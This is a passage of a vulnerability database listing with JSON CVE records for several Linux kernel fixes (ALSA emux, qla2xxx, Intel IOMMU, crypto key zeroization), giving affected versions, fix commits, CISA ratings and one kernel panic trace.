"url": "https://git.kernel.org/stable/c/79d9a000f0220cdaba1682d2a23c0d0c61d620a3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d23982ea9aa438f35a8c8a6305943e98a8db90f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a18293fd8d8519c2f7a03753bc1583b18e3db69"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0ff2443fcbb472206d45a5d2a90cc694065804e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8f5ce3cb9adf0c72e2ad6089aba02d7a32469c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87039b83fb7bfd7d0e0499aaa8e6c049906b4d14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89b32ccb12ae67e630c6453d778ec30a592a212f"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42097",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:18.485738Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:00.102Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/synth/emux/soundfont.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "40d7def67841343c10f8642a41031fecbb248bab",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "79d9a000f0220cdaba1682d2a23c0d0c61d620a3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d23982ea9aa438f35a8c8a6305943e98a8db90f6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7a18293fd8d8519c2f7a03753bc1583b18e3db69",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d0ff2443fcbb472206d45a5d2a90cc694065804e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d8f5ce3cb9adf0c72e2ad6089aba02d7a32469c2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "87039b83fb7bfd7d0e0499aaa8e6c049906b4d14",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "89b32ccb12ae67e630c6453d778ec30a592a212f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/synth/emux/soundfont.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: emux: improve patch ioctl data validation\n\nIn load_data(), make the validation of and skipping over the main info\nblock match that in load_guspatch().\n\nIn load_guspatch(), add checking that the specified patch length matches\nthe actually supplied data, like load_data() already did."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:56.455Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/40d7def67841343c10f8642a41031fecbb248bab"
},
{
"url": "https://git.kernel.org/stable/c/79d9a000f0220cdaba1682d2a23c0d0c61d620a3"
},
{
"url": "https://git.kernel.org/stable/c/d23982ea9aa438f35a8c8a6305943e98a8db90f6"
},
{
"url": "https://git.kernel.org/stable/c/7a18293fd8d8519c2f7a03753bc1583b18e3db69"
},
{
"url": "https://git.kernel.org/stable/c/d0ff2443fcbb472206d45a5d2a90cc694065804e"
},
{
"url": "https://git.kernel.org/stable/c/d8f5ce3cb9adf0c72e2ad6089aba02d7a32469c2"
},
{
"url": "https://git.kernel.org/stable/c/87039b83fb7bfd7d0e0499aaa8e6c049906b4d14"
},
{
"url": "https://git.kernel.org/stable/c/89b32ccb12ae67e630c6453d778ec30a592a212f"
}
],
"title": "ALSA: emux: improve patch ioctl data validation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42097",
"datePublished": "2024-07-29T17:39:32.470Z",
"dateReserved": "2024-07-29T15:50:41.173Z",
"dateUpdated": "2025-05-04T09:22:56.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42288 (GCVE-0-2024-42288)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix for possible memory corruption
Init Control Block is dereferenced incorrectly. Correctly dereference ICB
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42288",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:13.401777Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:30.047Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dae67169cb35a37ecccf60cfcd6bf93a1f4f5efb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "87db8d7b7520e99de71791260989f06f9c94953d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b0302ffc74123b6a99d7d1896fcd9b2e4072d9ce",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2a15b59a2c5afac89696e44acf5bbfc0599c6c5e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "571d7f2a08836698c2fb0d792236424575b9829b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8192c533e89d9fb69b2490398939236b78cda79b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c03d740152f78e86945a75b2ad541bf972fab92a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix for possible memory corruption\n\nInit Control Block is dereferenced incorrectly. Correctly dereference ICB"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:01.119Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dae67169cb35a37ecccf60cfcd6bf93a1f4f5efb"
},
{
"url": "https://git.kernel.org/stable/c/87db8d7b7520e99de71791260989f06f9c94953d"
},
{
"url": "https://git.kernel.org/stable/c/b0302ffc74123b6a99d7d1896fcd9b2e4072d9ce"
},
{
"url": "https://git.kernel.org/stable/c/2a15b59a2c5afac89696e44acf5bbfc0599c6c5e"
},
{
"url": "https://git.kernel.org/stable/c/571d7f2a08836698c2fb0d792236424575b9829b"
},
{
"url": "https://git.kernel.org/stable/c/8192c533e89d9fb69b2490398939236b78cda79b"
},
{
"url": "https://git.kernel.org/stable/c/c03d740152f78e86945a75b2ad541bf972fab92a"
}
],
"title": "scsi: qla2xxx: Fix for possible memory corruption",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42288",
"datePublished": "2024-08-17T09:08:53.466Z",
"dateReserved": "2024-07-30T07:40:12.262Z",
"dateUpdated": "2025-05-04T09:26:01.119Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48916 (GCVE-0-2022-48916)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 12:43
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Fix double list_add when enabling VMD in scalable mode
When enabling VMD and IOMMU scalable mode, the following kernel panic
call trace/kernel log is shown in Eagle Stream platform (Sapphire Rapids
CPU) during booting:
pci 0000:59:00.5: Adding to iommu group 42
...
vmd 0000:59:00.5: PCI host bridge to bus 10000:80
pci 10000:80:01.0: [8086:352a] type 01 class 0x060400
pci 10000:80:01.0: reg 0x10: [mem 0x00000000-0x0001ffff 64bit]
pci 10000:80:01.0: enabling Extended Tags
pci 10000:80:01.0: PME# supported from D0 D3hot D3cold
pci 10000:80:01.0: DMAR: Setup RID2PASID failed
pci 10000:80:01.0: Failed to add to iommu group 42: -16
pci 10000:80:03.0: [8086:352b] type 01 class 0x060400
pci 10000:80:03.0: reg 0x10: [mem 0x00000000-0x0001ffff 64bit]
pci 10000:80:03.0: enabling Extended Tags
pci 10000:80:03.0: PME# supported from D0 D3hot D3cold
------------[ cut here ]------------
kernel BUG at lib/list_debug.c:29!
invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
CPU: 0 PID: 7 Comm: kworker/0:1 Not tainted 5.17.0-rc3+ #7
Hardware name: Lenovo ThinkSystem SR650V3/SB27A86647, BIOS ESE101Y-1.00 01/13/2022
Workqueue: events work_for_cpu_fn
RIP: 0010:__list_add_valid.cold+0x26/0x3f
Code: 9a 4a ab ff 4c 89 c1 48 c7 c7 40 0c d9 9e e8 b9 b1 fe ff 0f
0b 48 89 f2 4c 89 c1 48 89 fe 48 c7 c7 f0 0c d9 9e e8 a2 b1
fe ff <0f> 0b 48 89 d1 4c 89 c6 4c 89 ca 48 c7 c7 98 0c d9
9e e8 8b b1 fe
RSP: 0000:ff5ad434865b3a40 EFLAGS: 00010246
RAX: 0000000000000058 RBX: ff4d61160b74b880 RCX: ff4d61255e1fffa8
RDX: 0000000000000000 RSI: 00000000fffeffff RDI: ffffffff9fd34f20
RBP: ff4d611d8e245c00 R08: 0000000000000000 R09: ff5ad434865b3888
R10: ff5ad434865b3880 R11: ff4d61257fdc6fe8 R12: ff4d61160b74b8a0
R13: ff4d61160b74b8a0 R14: ff4d611d8e245c10 R15: ff4d611d8001ba70
FS: 0000000000000000(0000) GS:ff4d611d5ea00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ff4d611fa1401000 CR3: 0000000aa0210001 CR4: 0000000000771ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
intel_pasid_alloc_table+0x9c/0x1d0
dmar_insert_one_dev_info+0x423/0x540
? device_to_iommu+0x12d/0x2f0
intel_iommu_attach_device+0x116/0x290
__iommu_attach_device+0x1a/0x90
iommu_group_add_device+0x190/0x2c0
__iommu_probe_device+0x13e/0x250
iommu_probe_device+0x24/0x150
iommu_bus_notifier+0x69/0x90
blocking_notifier_call_chain+0x5a/0x80
device_add+0x3db/0x7b0
? arch_memremap_can_ram_remap+0x19/0x50
? memremap+0x75/0x140
pci_device_add+0x193/0x1d0
pci_scan_single_device+0xb9/0xf0
pci_scan_slot+0x4c/0x110
pci_scan_child_bus_extend+0x3a/0x290
vmd_enable_domain.constprop.0+0x63e/0x820
vmd_probe+0x163/0x190
local_pci_probe+0x42/0x80
work_for_cpu_fn+0x13/0x20
process_one_work+0x1e2/0x3b0
worker_thread+0x1c4/0x3a0
? rescuer_thread+0x370/0x370
kthread+0xc7/0xf0
? kthread_complete_and_exit+0x20/0x20
ret_from_fork+0x1f/0x30
</TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
...
Kernel panic - not syncing: Fatal exception
Kernel Offset: 0x1ca00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
---[ end Kernel panic - not syncing: Fatal exception ]---
The following 'lspci' output shows devices '10000:80:*' are subdevices of
the VMD device 0000:59:00.5:
$ lspci
...
0000:59:00.5 RAID bus controller: Intel Corporation Volume Management Device NVMe RAID Controller (rev 20)
...
10000:80:01.0 PCI bridge: Intel Corporation Device 352a (rev 03)
10000:80:03.0 PCI bridge: Intel Corporation Device 352b (rev 03)
10000:80:05.0 PCI bridge: Intel Corporation Device 352c (rev 03)
10000:80:07.0 PCI bridge: Intel Corporation Device 352d (rev 03)
10000:81:00.0 Non-Volatile memory controller: Intel Corporation NVMe Datacenter SSD [3DNAND, Beta Rock Controller]
10000:82:00
---truncated---
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48916",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:44.397217Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:11.377Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/intel/iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2aaa085bd012a83be7104356301828585a2253ed",
"status": "affected",
"version": "474dd1c6506411752a9b2f2233eec11f1733a099",
"versionType": "git"
},
{
"lessThan": "d5ad4214d9c6c6e465c192789020a091282dfee7",
"status": "affected",
"version": "474dd1c6506411752a9b2f2233eec11f1733a099",
"versionType": "git"
},
{
"lessThan": "b00833768e170a31af09268f7ab96aecfcca9623",
"status": "affected",
"version": "474dd1c6506411752a9b2f2233eec11f1733a099",
"versionType": "git"
},
{
"status": "affected",
"version": "77c6a77a068c2304e3f19abee67b0c76dde4c0ea",
"versionType": "git"
},
{
"status": "affected",
"version": "7e6a4c304debd9be7cacecbe99b3481985e0c885",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/intel/iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.12.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/vt-d: Fix double list_add when enabling VMD in scalable mode\n\nWhen enabling VMD and IOMMU scalable mode, the following kernel panic\ncall trace/kernel log is shown in Eagle Stream platform (Sapphire Rapids\nCPU) during booting:\n\npci 0000:59:00.5: Adding to iommu group 42\n...\nvmd 0000:59:00.5: PCI host bridge to bus 10000:80\npci 10000:80:01.0: [8086:352a] type 01 class 0x060400\npci 10000:80:01.0: reg 0x10: [mem 0x00000000-0x0001ffff 64bit]\npci 10000:80:01.0: enabling Extended Tags\npci 10000:80:01.0: PME# supported from D0 D3hot D3cold\npci 10000:80:01.0: DMAR: Setup RID2PASID failed\npci 10000:80:01.0: Failed to add to iommu group 42: -16\npci 10000:80:03.0: [8086:352b] type 01 class 0x060400\npci 10000:80:03.0: reg 0x10: [mem 0x00000000-0x0001ffff 64bit]\npci 10000:80:03.0: enabling Extended Tags\npci 10000:80:03.0: PME# supported from D0 D3hot D3cold\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:29!\ninvalid opcode: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 0 PID: 7 Comm: kworker/0:1 Not tainted 5.17.0-rc3+ #7\nHardware name: Lenovo ThinkSystem SR650V3/SB27A86647, BIOS ESE101Y-1.00 01/13/2022\nWorkqueue: events work_for_cpu_fn\nRIP: 0010:__list_add_valid.cold+0x26/0x3f\nCode: 9a 4a ab ff 4c 89 c1 48 c7 c7 40 0c d9 9e e8 b9 b1 fe ff 0f\n 0b 48 89 f2 4c 89 c1 48 89 fe 48 c7 c7 f0 0c d9 9e e8 a2 b1\n fe ff \u003c0f\u003e 0b 48 89 d1 4c 89 c6 4c 89 ca 48 c7 c7 98 0c d9\n 9e e8 8b b1 fe\nRSP: 0000:ff5ad434865b3a40 EFLAGS: 00010246\nRAX: 0000000000000058 RBX: ff4d61160b74b880 RCX: ff4d61255e1fffa8\nRDX: 0000000000000000 RSI: 00000000fffeffff RDI: ffffffff9fd34f20\nRBP: ff4d611d8e245c00 R08: 0000000000000000 R09: ff5ad434865b3888\nR10: ff5ad434865b3880 R11: ff4d61257fdc6fe8 R12: ff4d61160b74b8a0\nR13: ff4d61160b74b8a0 R14: ff4d611d8e245c10 R15: ff4d611d8001ba70\nFS: 0000000000000000(0000) GS:ff4d611d5ea00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ff4d611fa1401000 CR3: 0000000aa0210001 CR4: 0000000000771ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n intel_pasid_alloc_table+0x9c/0x1d0\n dmar_insert_one_dev_info+0x423/0x540\n ? device_to_iommu+0x12d/0x2f0\n intel_iommu_attach_device+0x116/0x290\n __iommu_attach_device+0x1a/0x90\n iommu_group_add_device+0x190/0x2c0\n __iommu_probe_device+0x13e/0x250\n iommu_probe_device+0x24/0x150\n iommu_bus_notifier+0x69/0x90\n blocking_notifier_call_chain+0x5a/0x80\n device_add+0x3db/0x7b0\n ? arch_memremap_can_ram_remap+0x19/0x50\n ? memremap+0x75/0x140\n pci_device_add+0x193/0x1d0\n pci_scan_single_device+0xb9/0xf0\n pci_scan_slot+0x4c/0x110\n pci_scan_child_bus_extend+0x3a/0x290\n vmd_enable_domain.constprop.0+0x63e/0x820\n vmd_probe+0x163/0x190\n local_pci_probe+0x42/0x80\n work_for_cpu_fn+0x13/0x20\n process_one_work+0x1e2/0x3b0\n worker_thread+0x1c4/0x3a0\n ? rescuer_thread+0x370/0x370\n kthread+0xc7/0xf0\n ? kthread_complete_and_exit+0x20/0x20\n ret_from_fork+0x1f/0x30\n \u003c/TASK\u003e\nModules linked in:\n---[ end trace 0000000000000000 ]---\n...\nKernel panic - not syncing: Fatal exception\nKernel Offset: 0x1ca00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)\n---[ end Kernel panic - not syncing: Fatal exception ]---\n\nThe following \u0027lspci\u0027 output shows devices \u002710000:80:*\u0027 are subdevices of\nthe VMD device 0000:59:00.5:\n\n $ lspci\n ...\n 0000:59:00.5 RAID bus controller: Intel Corporation Volume Management Device NVMe RAID Controller (rev 20)\n ...\n 10000:80:01.0 PCI bridge: Intel Corporation Device 352a (rev 03)\n 10000:80:03.0 PCI bridge: Intel Corporation Device 352b (rev 03)\n 10000:80:05.0 PCI bridge: Intel Corporation Device 352c (rev 03)\n 10000:80:07.0 PCI bridge: Intel Corporation Device 352d (rev 03)\n 10000:81:00.0 Non-Volatile memory controller: Intel Corporation NVMe Datacenter SSD [3DNAND, Beta Rock Controller]\n 10000:82:00\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:43:59.905Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2aaa085bd012a83be7104356301828585a2253ed"
},
{
"url": "https://git.kernel.org/stable/c/d5ad4214d9c6c6e465c192789020a091282dfee7"
},
{
"url": "https://git.kernel.org/stable/c/b00833768e170a31af09268f7ab96aecfcca9623"
}
],
"title": "iommu/vt-d: Fix double list_add when enabling VMD in scalable mode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48916",
"datePublished": "2024-08-22T01:32:18.634Z",
"dateReserved": "2024-08-21T06:06:23.294Z",
"dateUpdated": "2025-05-04T12:43:59.905Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42229 (GCVE-0-2024-42229)
Vulnerability from cvelistv5
Published
2024-07-30 07:47
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: aead,cipher - zeroize key buffer after use
I.G 9.7.B for FIPS 140-3 specifies that variables temporarily holding
cryptographic information should be zeroized once they are no longer
needed. Accomplish this by using kfree_sensitive for buffers that
previously held the private key.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.567Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9db8c299a521813630fcb4154298cb60c37f3133"
},
{
"tags": [
"x_transferred"
],
